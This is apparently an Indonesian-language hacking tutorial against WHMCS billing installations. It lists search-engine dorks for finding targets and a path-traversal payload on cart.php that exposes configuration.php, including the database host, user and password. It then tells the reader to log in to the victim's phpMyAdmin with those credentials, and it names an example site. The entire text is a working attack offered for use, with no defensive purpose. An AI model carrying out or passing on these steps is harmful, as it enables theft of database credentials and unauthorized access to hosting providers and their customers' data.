Tutorial hacking WHMCS

Tutorial hacking WHMCS

Exploit Powered by whmcs



#Keyword Dork :

1. inurl:whmcs/cart.php?a=

2. inurl:billing/cart.php?a=



#Injector :

cart.php?a=test&templatefile=../../../configuration.php





#Contoh [sudah di patch/fix] :

http://www.7m2.net/whmcs/cart.php?





#Tambain Injector di belakang cart.php? sampe jdi :





http://target.com/whmcs/cart.php?a=test&...ration.php

#truz klik kanan > View page source



ntar muncul ...

$db

$license

$host

$user

$pass



bgtulah :v, tinggal login di

http://www.target.com/phpmyadmin



xixixixixiiii.... :3